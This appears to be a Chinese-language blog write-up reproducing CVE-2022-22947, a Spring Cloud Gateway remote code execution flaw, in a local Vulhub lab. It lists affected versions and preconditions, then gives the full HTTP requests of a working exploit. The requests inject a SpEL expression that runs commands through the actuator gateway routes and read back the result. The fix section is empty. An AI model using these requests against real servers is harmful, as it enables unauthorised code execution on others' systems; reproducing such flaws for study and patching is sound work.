CVE-2022-22947:SpringCloudGateway远程代码执⾏漏洞复现及修复建议CVE-2022-22947:Spring Cloud Gateway 远程代码执⾏漏洞复现及修复建议
本⽂仅为验证漏洞,在本地环境测试验证,⽆其它⽬的
CVE 编号:
CVE-2022-22947
漏洞说明:
2022年3⽉1⽇,VMware官⽅发布漏洞报告,在使⽤Spring Colud Gateway的应⽤程序开启、暴露Gateway Actuator端点时,会容易造成代码注⼊攻击,攻击者可以制造恶意请求,在远程主机进⾏任意远程执⾏。
漏洞影响范围:
Spring Cloud Gateway 3.1.x < 3.1.1
Spring Cloud Gateway 3.0.x < 3.0.7
旧的、不受⽀持的版本也会受到影响
漏洞级别:
⾼危
利⽤条件:
参考:
1. 除了Spring Cloud Gateway 外,程序还⽤到了 Spring Boot Actuator 组件(它⽤于对外提供 /actuator/ 接⼝);
2. Spring 配置对外暴露 gateway 接⼝,如 application.properties 配置为:
# 默认为true
# 以逗号分隔的⼀系列值,默认为 health
# 若包含 gateway 即表⽰对外提供 Spring Cloud Gateway 接⼝
漏洞复现:
本次复现采⽤Vulhub靶场环境,需要在本地搭建Vulhub靶场(⾃⾏百度,如有问题可以沟通交流,后期时间充⾜可以再出Vulhub搭建教程),需注意将请求中的代码更换为靶机所在IP
(参考:)
1. 进⼊靶场环境:【Vulhub}-【Spring】-【CVE-2022-22947】
2. 启动服务:
docker-compose up -d
3.
4. 此处要注意,因为靶场会占⽤8080端⼝,所以当BP和靶场在统⼀环境下时,注意修改BP的8080端⼝为其他,并在浏览器中进⾏更
新才能访问靶场环境
5. 构造包含恶意请求的路由,利⽤BP进⾏发送:(图中标出的执⾏参数,更换id为whoami等可进⾏验证)
POST /actuator/gateway/routes/hacktest HTTP/1.1
Host: 192.168.32.130:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close
Content-Type: application/json
Content-Length: 329
{
"id":"hacktest",
"filters":[{
"name":"AddResponseHeader",
"args":{
"args":{
"name":"Result",
"value":"#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInp utStream()))}"
}
}],
"uri":"example"
}
6. 然后应⽤刚添加的路由发送如下数据包,此数据包会触发表达式执⾏:
POST /actuator/gateway/refresh HTTP/1.1
Host: 192.168.32.130:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
7. 发送如下数据包可查看结果:
cve漏洞库GET /actuator/gateway/routes/hacktest HTTP/1.1
Host: 192.168.32.130:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
8. 最后发送如下数据包进⾏清理,删除所添加的路由:
DELETE /actuator/gateway/routes/hacktest HTTP/1.1
Host: 192.168.32.130:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close
9. 再次刷新路由:
POST /actuator/gateway/refresh HTTP/1.1
Host: 192.168.32.130:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
0. 以上漏洞环境使⽤完成后,使⽤以下命令进⾏环境移除:
docker-compose down
如果不会搭建Vulhub本地靶场,可利⽤在线靶场,进⾏注册后在线使⽤,有问题可以交流
漏洞修复:
参考:
发表评论